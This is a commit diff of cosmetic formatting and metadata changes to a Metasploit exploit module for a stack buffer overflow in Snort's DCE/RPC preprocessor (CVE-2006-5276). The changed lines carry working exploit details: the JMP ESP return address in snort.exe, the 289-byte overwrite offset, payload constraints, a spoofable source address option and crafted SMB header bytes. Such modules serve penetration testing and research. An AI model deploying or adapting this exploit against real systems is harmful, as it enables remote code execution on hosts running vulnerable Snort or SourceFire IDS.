Some cosmetic changes

modules/exploits/windows/ids/snort_dce_rpc.rb

@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -19,59 +15,61 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'Stack-based buffer overflow in the DCE/RPC preprocessor in Snort',
-			'Description'	=> %q{
-					This module allows remote attackers to execute arbitrary code exploiting the
-				Snort service via crafted SMB traffic. The vulnerability is caused due to a boundary
-				error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests. This
-				can be exploited to cause a stack-based buffer overflow via a specially crafted packet
+			'Name'            => 'Snort 2 DCE/RPC preprocessor Buffer Overflow',
+			'Description'     => %q{
+					This module allows remote attackers to execute arbitrary code by exploiting the
+				Snort service via crafted SMB traffic. The vulnerability is due to a boundary
+				error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
+				which may result a stack-based buffer overflow with a specially crafted packet
 				sent on a network that is monitored by Snort.
 
 				Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.
 
 				Any host on the Snort network may be used as the remote host. The remote host does not
 				need to be running the SMB service for the exploit to be successful.
-
-				Original discovery by Neel Mehta, IBM Internet Security Systems X-Force.
 			},
-			'Author'	=> [ 'Carsten Maartmann-Moe <carsten@carmaa.com>' ],
-			'License'	=> MSF_LICENSE,
-			'Version'	=> '$Revision$',
-			'Platform'	=> 'win',
-			'References'	=>
+			'Author'          =>
+				[
+					'Neel Mehta', #Original discovery (IBM X-Force)
+					'Carsten Maartmann-Moe <carsten[at]carmaa.com>'  #Metasploit
+				],
+			'License'         => MSF_LICENSE,
+			'Platform'        => 'win',
+			'References'      =>
 				[
 					[ 'OSVDB', '67988' ],
-					[ 'CVE', 'CVE-2006-5276' ],
+					[ 'CVE', '2006-5276' ],
 					[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
 				],
-			'DefaultOptions'=>
+			'DefaultOptions'  =>
 				{
-					'EXITFUNC'	=> 'thread',
+					'EXITFUNC' => 'thread',
 				},
-			'Payload'	=>
+			'Payload'         =>
 				{
-					'Space'		=> 390,
-					'BadChars'	=> "\x00",
-					'DisableNops'	=> true,
+					'Space'         => 390,
+					'BadChars'      => "\x00",
+					'DisableNops'   => true,
 				},
-			'Targets'	=>
+			'Targets'         =>
 				[
-					[ 'Windows Universal',
+					[
+						'Windows Universal',
 						{
-							'Ret'		=> 0x00407c01,	# JMP ESP snort.exe
-							'Offset'	=> 289		# The number of bytes before overwrite
+							'Ret'    => 0x00407c01,  # JMP ESP snort.exe
+							'Offset' => 289          # The number of bytes before overwrite
 						}
 					],
 				],
-			'Privileged'	=> true,
-			'DisclosureDate'=> 'Feb 19 2007',
-			'DefaultTarget'	=> 0))
+			'Privileged'      => true,
+			'DisclosureDate'  => 'Feb 19 2007',
+			'DefaultTarget'   => 0))
 
 		register_options(
 			[
 				Opt::RPORT(139),
 				OptAddress.new('RHOST', [ true,  'A host on the Snort-monitored network' ]),
-				OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address', nil ])
+				OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])
 			], self.class)
 
 		deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
@@ -136,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
 		header << "\x00\x48\x00\x00\x00\xff\x01"
 
-		tail =    "\x00\x00\x00\x00\x49\x00\xee"
+		tail = "\x00\x00\x00\x00\x49\x00\xee"
 
 		# Return address
 		eip =  [target['Ret']].pack('V')